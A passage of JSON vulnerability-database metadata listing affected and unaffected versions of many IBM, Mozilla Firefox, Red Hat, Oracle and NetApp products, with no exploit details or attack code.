viewpoint fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "rational test workbench", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0.1" }, { "model": "cognos command center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "rlks administration agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.4" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.23" }, { "model": "datapower gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.6" }, { "model": "flex system chassis management module 2pet", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.1.0.7" }, { "model": "rlks administration and reporting tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.4.5" }, { "model": "rational test workbench", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.7.0.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.11" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.2" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3" }, { "model": "rational software architect realtime edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "predictive insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "17.0.8" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.03" }, { "model": "system networking rackswitch g8316", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.9.16.0" }, { "model": "flex system fabric si4093 system interconnect module", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.12.0" }, { "model": "sterling external authentication server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.1.0" }, { "model": "rational developer for aix and cobol", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.16" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "control center ifix03", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.1" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.2" }, { "model": "security directory integrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "host on-demand", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.0.14" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.5.19" }, { "model": "sterling connect:direct ftp+", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3" }, { "model": "infosphere optim query workload tuner for db2 for z/os", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "tivoli system automation for multiplatforms", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.1" }, { "model": "tivoli directory server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.1" }, { "model": "websphere service registry and repository studio", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.17" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "rational software architect realtime edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2" }, { "model": "spss modeler", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "17.0.0.1" }, { "model": "business process manager advanced", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.3" }, { "model": "virtual storage console for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "api management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "spectrum scale", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2" }, { "model": "rational method composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.50" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "4.0.1" }, { "model": "b-type san directors", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "flashsystem 9840-ae1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v840" }, { "model": "sterling external authentication server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.1.6" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "10.0.4" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.7" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.5.7" }, { "model": "watson explorer foundational components", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.0.0.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "14.0" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.16" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.7.0.2" }, { "model": "system networking switch center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.1.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "10.0.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.5.6" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.12" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "10.0.9" }, { "model": "content foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.0" }, { "model": "mq light", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.2" }, { "model": "sterling external authentication server ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.1.85" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.0.4" }, { "model": "rational engineering lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.4" }, { "model": "system networking switch center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.32" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.1.0" }, { "model": "data studio client", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "13.0" }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v70007.6.0.3" }, { "model": "snapcenter plug-in for windows", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "sterling secure proxy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.2" }, { "model": "license metric tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0" }, { "model": "business process manager advanced", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "rational engineering lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.27" }, { "model": "business process manager advanced", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.2" }, { "model": "bluemix liberty for java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "g8264cs si fabric image", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.12.0" }, { "model": "rational test workbench", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.3" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.7.2" }, { "model": "business process manager express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.1" }, { "model": "flashsystem 9848-ae1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v840" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.0" }, { "model": "tivoli access manager for e-business", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.1" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.2" }, { "model": "websphere operational decision management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "system networking rackswitch g8124", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.9.16.0" }, { "model": "business process manager express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.0.17" }, { "model": "purepower integrated manager appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "rational test workbench", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0.1" }, { "model": "datapower gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.1.9" }, { "model": "security appscan enterprise", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "7-mode transition tool", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "datapower gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.13" }, { "model": "business process manager express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "27.0" }, { "model": "fabric operating system 7.4.1c", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.2.0.8" }, { "model": "sterling secure proxy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.1.5" }, { "model": "marketing platform", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "31.0" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "24.0.1" }, { "model": "rational developer for c/c++", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "rational test workbench", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.3" }, { "model": "sterling external authentication server ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0.405" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "10.0.5" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.0" }, { "model": "business process manager express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.4.19" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "31.4" }, { "model": "spss modeler", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "14.2" }, { "model": "websphere partner gateway enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1.2" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.9" }, { "model": "websphere extreme scale", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.32" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.0.0.12" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.9" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "31.5" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.15.1" }, { "model": "business process manager standard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.4.1.8" }, { "model": "websphere lombardi edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "17.0.7" }, { "model": "cognos insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.0.4" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.51" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.23" }, { "model": "purepower integrated manager power vc appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "datapower gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.1.13" }, { "model": "websphere real time sr6", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "10.0.6" }, { "model": "predictive insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "b2b advanced communications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.0.2" }, { "model": "infosphere biginsights", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0.2" }, { "model": "rational test workbench", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.14" }, { "model": "websphere real time sr4-fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "rational developer for c/c++", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.1" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.16" }, { "model": "powerkvm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "24.0" }, { "model": "business process manager standard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1.1" }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v50007.5.0.6" }, { "model": "rational test workbench", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.5" }, { "model": "sterling secure proxy ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.2.06" }, { "model": "gpfs storage server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.2" }, { "model": "cplex enterprise server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "12.4" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.1.4" }, { "model": "ilog optimization decision manager enterprise", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "rational doors next generation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.2" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.18" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.6" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.5.8" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.11" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.9" }, { "model": "data studio client", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "8.0" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.11" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.1.3" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.6" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.21" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.0.1" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1.1" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.7" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.8" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "12.0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.07" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "31.3.0" }, { "model": "rational synergy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.8" }, { "model": "rlks administration and reporting tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.4.3" }, { "model": "tivoli storage manager operations center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4.2000" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "17.0.2" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.13" }, { "model": "rational test workbench", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.1" }, { "model": "spss modeler fp2 if013", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "16" }, { "model": "si4093 image", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.12.0" }, { "model": "bluemix liberty for java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.8" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "10.0.3" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.2" }, { "model": "datapower gateway", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.11" }, { "model": "sterling external authentication server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.17" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.3" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.1" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.6" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.0.8" }, { "model": "flex system fabric en4093r 10gb scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.12.0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "filenet business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.7" }, { "model": "sterling external authentication server ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.2.02" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.1" }, { "model": "infosphere data architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.0.7" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "41.0.2" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "24.1.1" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.3" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.0.15" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "43.0.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.11" }, { "model": "business process manager advanced", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "oncommand cloud manager", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "gpfs storage server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.6" }, { "model": "rlks administration agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.4.3" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3.0.1" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "rational synergy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.6" }, { "model": "ilog optimization decision manager enterprise", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4" }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v37007.4.0.7" }, { "model": "tivoli directory server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.1.15" }, { "model": "integrated management module ii for system 1aoo", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.3" }, { "model": "watson content analytics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.0.3" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.5.0.5" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "24.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.0.11" }, { "model": "rational developer for aix and linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "36" }, { "model": "messagesight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.1" }, { "model": "rational test workbench", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0.3" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "rational software architect realtime edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.1" }, { "model": "rational engineering lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.7" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.3" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.211" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "watson explorer foundational components", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.0.0.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "sterling external authentication server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.1.1" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0.1" }, { "model": "watson explorer analytical components", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "business process manager advanced", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.0" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.5.0.7" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.6" }, { "model": "operational decision manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.7" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "rational engineering lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.3" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "19.0.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.0.5" }, { "model": "san volume controller", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.12" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.17" }, { "model": "rlks administration and reporting tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.4.2" }, { "model": "spss modeler", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "15.0" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.17" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1.1" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.12" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.3" }, { "model": "flashsystem 9846-ac0", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v840" }, { "model": "system networking rackswitch g8264cs", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.8.13.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.4" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.17.3" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.0.3" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.16" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0" }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "business process manager express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "content foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.16" }, { "model": "spss analytic server", 